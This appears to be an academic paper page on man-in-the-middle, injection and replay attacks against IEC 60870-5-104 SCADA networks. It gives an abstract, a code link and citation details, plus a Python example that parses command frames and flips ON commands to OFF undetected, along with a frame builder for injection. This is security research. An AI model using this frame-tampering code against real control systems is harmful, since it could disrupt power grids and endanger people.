This paper investigates cyber attacks on industrial control systems (ICS) that rely on IEC 60870-5-104 for telecontrol communications. The main focus is on man-in-the-middle attacks, covering modification and injection of commands; capture and replay attacks are also detailed. An initial set of attacks is performed in a local, software-simulated laboratory. Final experiments and validation of a man-in-the-middle attack are performed in a comprehensive testbed environment in conjunction with an electricity distribution operator.
Code available at https://github.com/PMaynard/ettercap-104-mitm
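The command-modification attack the abstract describes comes down to changing a single bit in a forwarded IEC 60870-5-104 frame. The following is an added illustration, not the paper's ettercap filter from the repository above: it decodes an I-format APDU carrying a single command (C_SC_NA_1, type 45), flips the SCS bit the way a man-in-the-middle would so that ON arrives as OFF, and assembles a fresh command frame of the kind an injection attack would have to fit into the live TCP stream. The sample frame is constructed for illustration, not captured traffic.

```python
"""
Byte-level view of man-in-the-middle command modification and injection on
IEC 60870-5-104 (added example; the sample APDU is constructed, not captured).
"""
import struct

START_BYTE = 0x68
C_SC_NA_1 = 45            # single command (ASDU type identification)
COT_ACTIVATION = 6        # cause of transmission: activation
APCI_LEN = 6              # start byte, length byte, four control-field bytes
ASDU_HEADER_LEN = 6       # type, VSQ, COT, originator, common address (2 bytes)
IOA_LEN = 3               # information object address

# Constructed sample: controlling station -> RTU, N(S)=0, N(R)=0,
# single command, COT=activation, common address 1, IOA 1, SCS=1 (ON).
SAMPLE_ON = bytes.fromhex("68 0e 00 00 00 00 2d 01 06 00 01 00 01 00 00 01")


def parse_apdu(apdu: bytes) -> dict:
    """Decode the APCI control fields and ASDU header of an I-format frame.

    Only frames with exactly one information object (VSQ = 0x01) are handled,
    which is what a single command looks like; anything else raises ValueError.
    """
    if len(apdu) < APCI_LEN or apdu[0] != START_BYTE:
        raise ValueError("not an IEC 104 APDU")
    if apdu[1] != len(apdu) - 2:        # length excludes start and length bytes
        raise ValueError("APCI length field does not match frame size")
    cf1, cf2, cf3, cf4 = apdu[2:APCI_LEN]
    if cf1 & 0x01:                      # bit 0 set: S-format (01) or U-format (11)
        raise ValueError("S- or U-format frame carries no ASDU")
    asdu = apdu[APCI_LEN:]
    type_id, vsq, cot, originator, common_address = struct.unpack(
        "<BBBBH", asdu[:ASDU_HEADER_LEN])
    if vsq != 0x01:                     # SQ=0, one object
        raise ValueError("example handles exactly one information object")
    obj = asdu[ASDU_HEADER_LEN:]
    return {
        "ns": ((cf2 << 8) | cf1) >> 1,  # 15-bit send sequence number
        "nr": ((cf4 << 8) | cf3) >> 1,  # 15-bit receive sequence number
        "type_id": type_id,
        "cot": cot & 0x3F,
        "negative": bool(cot & 0x40),   # P/N bit
        "test": bool(cot & 0x80),       # T bit
        "originator": originator,
        "common_address": common_address,
        "ioa": int.from_bytes(obj[:IOA_LEN], "little"),
        "payload": obj[IOA_LEN:],       # SCO byte for type 45
    }


def single_command_state(apdu: bytes) -> str:
    """Return 'ON' or 'OFF' from the SCS bit of a C_SC_NA_1 frame."""
    frame = parse_apdu(apdu)
    if frame["type_id"] != C_SC_NA_1:
        raise ValueError("not a single command")
    return "ON" if frame["payload"][0] & 0x01 else "OFF"


def build_single_command(ns: int, nr: int, common_address: int, ioa: int,
                         on: bool, select: bool = False) -> bytes:
    """Assemble an I-format APDU carrying one C_SC_NA_1 activation.

    For an injected frame N(S)/N(R) must match the live connection's counters,
    otherwise the receiver treats it as a sequence error.
    """
    sco = (0x80 if select else 0x00) | (0x01 if on else 0x00)   # S/E bit, SCS bit
    asdu = (struct.pack("<BBBBH", C_SC_NA_1, 0x01, COT_ACTIVATION, 0, common_address)
            + ioa.to_bytes(IOA_LEN, "little") + bytes([sco]))
    apci = bytes([START_BYTE, 4 + len(asdu),            # length = control fields + ASDU
                  (ns << 1) & 0xFF, (ns >> 7) & 0xFF,
                  (nr << 1) & 0xFF, (nr >> 7) & 0xFF])
    return apci + asdu


def mitm_flip_single_command(apdu: bytes) -> bytes:
    """The modification attack: invert SCS in a frame being forwarded.

    Sequence numbers, addresses and length are untouched, so neither end sees
    a protocol error. Frames that are not single-command activations pass
    through unchanged.
    """
    frame = parse_apdu(apdu)
    if frame["type_id"] != C_SC_NA_1 or frame["cot"] != COT_ACTIVATION:
        return apdu
    out = bytearray(apdu)
    out[APCI_LEN + ASDU_HEADER_LEN + IOA_LEN] ^= 0x01
    return bytes(out)


if __name__ == "__main__":
    forwarded = mitm_flip_single_command(SAMPLE_ON)
    print("original :", SAMPLE_ON.hex(), single_command_state(SAMPLE_ON))
    print("forwarded:", forwarded.hex(), single_command_state(forwarded))
```

The flip is possible because IEC 60870-5-104 as specified carries no authentication or integrity protection over the APDU; only the APCI length and sequence counters have to stay consistent, and the modified frame keeps both. The same parser is what a detection approach would use to compare the command logged at the control centre against the one the RTU actually received.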
2nd International Symposium for ICS & SCADA Cyber Security Research (2014)
SCADA, Cyber-security, Man-in-the-middle attacks, IEC 60870-5-104
@conference{maynard2014mitm104,
  author    = "Peter Maynard and Kieran McLaughlin and Berthold Haberler",
  title     = "Towards Understanding Man-In-The-Middle Attacks on IEC 60870-5-104 SCADA Networks",
  booktitle = "2nd International Symposium for ICS \& SCADA Cyber Security Research",
  year      = "2014",
  doi       = "10.14236/ewic/ics-csr2014.5"
}